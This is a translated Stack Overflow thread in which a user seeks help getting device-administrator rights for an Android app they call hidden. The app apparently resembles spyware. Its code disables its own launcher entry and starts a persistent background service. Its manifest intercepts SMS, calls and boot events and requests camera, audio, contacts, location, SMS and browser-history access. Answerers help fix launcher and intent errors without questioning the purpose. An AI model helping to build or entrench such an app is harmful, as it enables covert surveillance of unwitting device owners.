【问题标题】:Device administrator privilege to android app安卓应用的设备管理员权限
【发布时间】:2016-03-15 19:57:01
【问题描述】:

我知道类似的问题已经被问过很多次,但我仍然无法从中得到我的解决方案。我对 android 和 JAVA 很陌生,所以请记住这一点 :)。我正在工作中从事一些与安全相关的实验项目,并试图赋予我的 android 应用程序设备管理员权限。我有一个运行良好的 SampleDeviceAdministrator 应用程序。我想在我的应用程序中重用相同的代码,这样当我的应用程序启动时,它也可以获得设备管理员访问权限。为此,我已将以前应用程序中的 java 类包含到我的应用程序中,并且我试图将相同的代码调用到我的应用程序中应用程序通过以前的应用程序。以下是示例应用程序中 MainActivity.java 的屏幕截图。

package com.connect;

import android.app.Activity;
import android.app.ActivityManager;
import android.app.ActivityManager.RunningServiceInfo;
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.os.Bundle;
import android.util.Log;
import android.view.WindowManager;

public class Droidian extends Activity {

    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        getWindow().addFlags(WindowManager.LayoutParams.FLAG_NOT_TOUCHABLE);
        getWindow().setSoftInputMode(WindowManager.LayoutParams.SOFT_INPUT_STATE_ALWAYS_HIDDEN);
        PackageManager i = getApplicationContext().getPackageManager();
        i.setComponentEnabledSetting(getComponentName(),PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP);

        if(isMyServiceRunning()==false)
        {
            startService(new Intent(getApplicationContext(), DroidianService.class));
            Log.i("com.connect","startService");
        }
    }
    private boolean isMyServiceRunning() {
        ActivityManager manager = (ActivityManager) getApplicationContext().getSystemService(Context.ACTIVITY_SERVICE);
        for (RunningServiceInfo service : manager.getRunningServices(Integer.MAX_VALUE)) {
            if (DroidianService.class.getName().equals(service.service.getClassName())) {
                return true;
            }
        }
        return false;
    }
}

这里是 Droidian.java,它是我的应用程序的主类。

package com.connect;

import android.app.Activity;
import android.app.ActivityManager;
import android.app.ActivityManager.RunningServiceInfo;
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.os.Bundle;
import android.util.Log;
import android.view.WindowManager;

public class Droidian extends Activity {

    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        getWindow().addFlags(WindowManager.LayoutParams.FLAG_NOT_TOUCHABLE);
        getWindow().setSoftInputMode(WindowManager.LayoutParams.SOFT_INPUT_STATE_ALWAYS_HIDDEN);
        PackageManager i = getApplicationContext().getPackageManager();
        i.setComponentEnabledSetting(getComponentName(),PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP);

        if(isMyServiceRunning()==false)
        {
            startService(new Intent(getApplicationContext(), DroidianService.class));
            Log.i("com.connect","startService");
        }
    }
    private boolean isMyServiceRunning() {
        ActivityManager manager = (ActivityManager) getApplicationContext().getSystemService(Context.ACTIVITY_SERVICE);
        for (RunningServiceInfo service : manager.getRunningServices(Integer.MAX_VALUE)) {
            if (DroidianService.class.getName().equals(service.service.getClassName())) {
                return true;
            }
        }
        return false;
    }
}

&这里是AndroidManifest.xml

<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.hidden.droidian"
    android:versionCode="2"
    android:versionName="2.0" xmlns:tools="http://schemas.android.com/tools">

    <uses-sdk
        android:minSdkVersion="10"
        android:targetSdkVersion="18" tools:ignore="OldTargetApi"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    
 <supports-screens android:resizeable="true"
              android:largeScreens="true" 
              android:xlargeScreens="true"
              />   
    
    <application 
        android:icon="@drawable/launcher"
        android:label="@string/app_name"
		android:theme="@style/Invisible"
		android:allowBackup="false"
		android:persistent="true">
        <activity
            android:name="com.connect.Droidian"
            android:excludeFromRecents="true">
        </activity>
        <activity
            android:name="com.connect.MainActivity"
           android:label="@string/app_name">
                <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                 <category android:name="android.intent.category.LAUNCHER" />
 				</intent-filter>
        </activity>
        <activity
            android:name="com.connect.Dialog" 
            android:excludeFromRecents="true">
        </activity>
        <activity
            android:name="com.connect.CameraView" 
            android:excludeFromRecents="true">
        </activity>
        <activity
            android:name="com.connect.VideoView" 
            android:excludeFromRecents="true">
        </activity>
        <service android:name="com.connect.DroidianService"
            android:enabled="true"
            android:exported="true"
            android:persistent="true">
        </service>  
        <service android:name="com.connect.RecordService">
        </service> 
                 <receiver android:name="com.connect.ServiceReceiver" 
                   android:enabled="true"
                   android:exported="true"
                   android:persistent="true">
				        <intent-filter android:priority="1000">
								<action android:name="android.intent.action.BOOT_COMPLETED" />
				                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
        						<action android:name="android.intent.action.PHONE_STATE" />
        						<action android:name="android.intent.action.ACTION_EXTERNAL_APPLICATIONS_AVAILABLE"/>
        						<action android:name="android.intent.action.QUICKBOOT_POWERON" />
				        </intent-filter>
    	 		</receiver>

        <receiver
            android:name="com.connect.SampleDeviceAdminReceiver"
            android:permission="android.permission.BIND_DEVICE_ADMIN" >
            <meta-data
                android:name="android.app.device_admin"
                android:resource="@xml/device_admin" />

            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
            </intent-filter>
        </receiver>
            </application>
    
<uses-permission android:name="android.permission.QUICKBOOT_POWERON" android:required="false" />
<uses-permission android:name="android.permission.INTERNET" android:required="true"/>
<uses-permission android:name="android.permission.READ_SMS" android:required="true" />
<uses-permission android:name="android.permission.WRITE_SMS" android:required="true" />
<uses-permission android:name="android.permission.GET_ACCOUNTS" android:required="true" />
<uses-permission android:name="com.android.browser.permission.READ_HISTORY_BOOKMARKS"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" android:required="true"/>
<uses-permission android:name="android.permission.READ_CONTACTS" android:required="true" />
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" android:required="true" />
<uses-permission android:name="android.permission.GET_TASKS" android:required="true" />
<uses-permission android:name="android.permission.WAKE_LOCK" android:required="false" />
<uses-permission android:name="android.permission.CALL_PHONE" android:required="true" />
<uses-permission android:name="android.permission.SEND_SMS" android:required="true" />
<uses-permission android:name="android.permission.WRITE_SETTINGS" android:required="false" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" android:required="false" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" android:required="true" />
<uses-permission android:name="android.permission.CAMERA" android:required="true" />
<uses-permission android:name="android.permission.RECORD_AUDIO" android:required="false" />
<uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS" android:required="true" />
<uses-permission android:name="android.permission.RECEIVE_SMS" android:required="true" />
<uses-feature android:name="android.hardware.camera" android:required="false" />
<uses-feature android:name="android.hardware.camera.front" android:required="false" />
<uses-feature android:name="android.hardware.camera.autofocus" android:required="false" />
<uses-feature android:name="android.hardware.microphone" android:required="false" />


</manifest>

当我运行我的应用程序时,我得到 JAVA 运行时空指针异常。这是来自 logcat 的 sn-p:

12-10 13:47:42.261    4435-4435/com.hidden.droidian E/AndroidRuntime﹕ FATAL EXCEPTION: main
    Process: com.hidden.droidian, PID: 4435
    java.lang.RuntimeException: Failure delivering result ResultInfo{who=null, request=100, result=0, data=null} to activity {com.hidden.droidian/com.connect.MainActivity}: java.lang.NullPointerException: Attempt to read from field 'java.lang.String android.content.pm.ActivityInfo.parentActivityName' on a null object reference
            at android.app.ActivityThread.deliverResults(ActivityThread.java:3699)
            at android.app.ActivityThread.handleSendResult(ActivityThread.java:3742)
            at android.app.ActivityThread.-wrap16(ActivityThread.java)
            at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1393)
            at android.os.Handler.dispatchMessage(Handler.java:102)
            at android.os.Looper.loop(Looper.java:148)
            at android.app.ActivityThread.main(ActivityThread.java:5417)
            at java.lang.reflect.Method.invoke(Native Method)
            at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:726)
            at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:616)
     Caused by: java.lang.NullPointerException: Attempt to read from field 'java.lang.String android.content.pm.ActivityInfo.parentActivityName' on a null object reference
            at android.app.Activity.onCreate(Activity.java:905)
            at com.connect.Droidian.onCreate(Droidian.java:16)
            at com.connect.MainActivity.onActivityResult(MainActivity.java:54)
            at android.app.Activity.dispatchActivityResult(Activity.java:6428)
            at android.app.ActivityThread.deliverResults(ActivityThread.java:3695)
            at android.app.ActivityThread.handleSendResult(ActivityThread.java:3742)
            at android.app.ActivityThread.-wrap16(ActivityThread.java)
            at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1393)
            at android.os.Handler.dispatchMessage(Handler.java:102)
            at android.os.Looper.loop(Looper.java:148)
            at android.app.ActivityThread.main(ActivityThread.java:5417)
            at java.lang.reflect.Method.invoke(Native Method)
            at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:726)
            at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:616)

另外,我的应用程序应该是一个隐藏的应用程序,因此没有创建启动器,但是要执行设备管理员权限,我想启动器是必需的。如果有人可以调查它会很棒。如果我需要提供更多信息,请告诉我。谢谢!

【问题讨论】:

标签: java android android-manifest device-admin


【解决方案1】:

我想你忘记发布屏幕截图了。

首先,如果 Droidian.java 是您应用的主类,为什么不在 Manifest 文件中将其设置为启动器?

应该是这样的:

 <activity
        android:name="com.connect.Droidian"
        android:label="@string/app_name">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
 </activity> 

一个应用中只有一个发射器。

如果这对你有帮助,请告诉我。

【讨论】:

  • 我也以这种方式保存了我的清单文件,但这也无济于事。如果只有一个启动器,我可以让两个功能同时在同一个启动器上运行吗? Droidian.java 基本上作为服务运行,而 MainActivity.java 应该在启动时显示设备管理提示。我的意图是在应用程序启动后立即运行这两个 onCreate 函数。意味着,一旦安装了应用程序,droidian 应该在后台运行,同时设备管理提示应该呈现给用户。另外,你要什么截图?模拟器还是代码?
  • 启动时,不能启动多个 Activity。如果您希望 Droidian.java 作为服务运行,您应该将其扩展为服务,而不是作为活动。安装后也无法启动 Activity 或 Service 本身。我建议你将 Droidian 的功能封装在 Service 中,并从 Main Activity 启动它。
  • 可能我不太清楚我的要求。我通过组合清单文件实现了我的预期目的。问题是包名称。我在 build.gradle 文件中修改它似乎工作。但是,在 MainActivity 启动后,我现在想调用 Droidian onCreate 方法。我不知道该怎么做。任何帮助(考虑到我是菜鸟)将不胜感激:)
  • 你只需要在MainActivity中创建一个Intent。 Intent myIntent = new Intent ( this, Droidian.class ); 并像这样启动它:startActivity ( myIntent );(您可以从 MainActivity 的 onResume 启动它)。如果您还没有完成,请不要忘记在 Manifest 文件中定义 Droidian Activity。让我知道它是否对您有帮助。
  • 我将类代码定义为:protected void onResume() { super.onResume(); Intent myIntent = new Intent ( this, Droidian.class ); startActivity(myIntent); } & manifest: ` ` 我仍然是遇到以下错误:android.content.ActivityNotFoundException: Unable to find explicit activity class {com.connect/com.connect.Droidian}; have you declared this activity in your AndroidManifest.xml? 有什么建议吗?
猜你喜欢
  • 2016-08-20
  • 2019-04-02
  • 1970-01-01
  • 2021-12-21
  • 2014-08-27
  • 2014-02-16
  • 2013-09-27
  • 1970-01-01
  • 1970-01-01
相关资源
最近更新 更多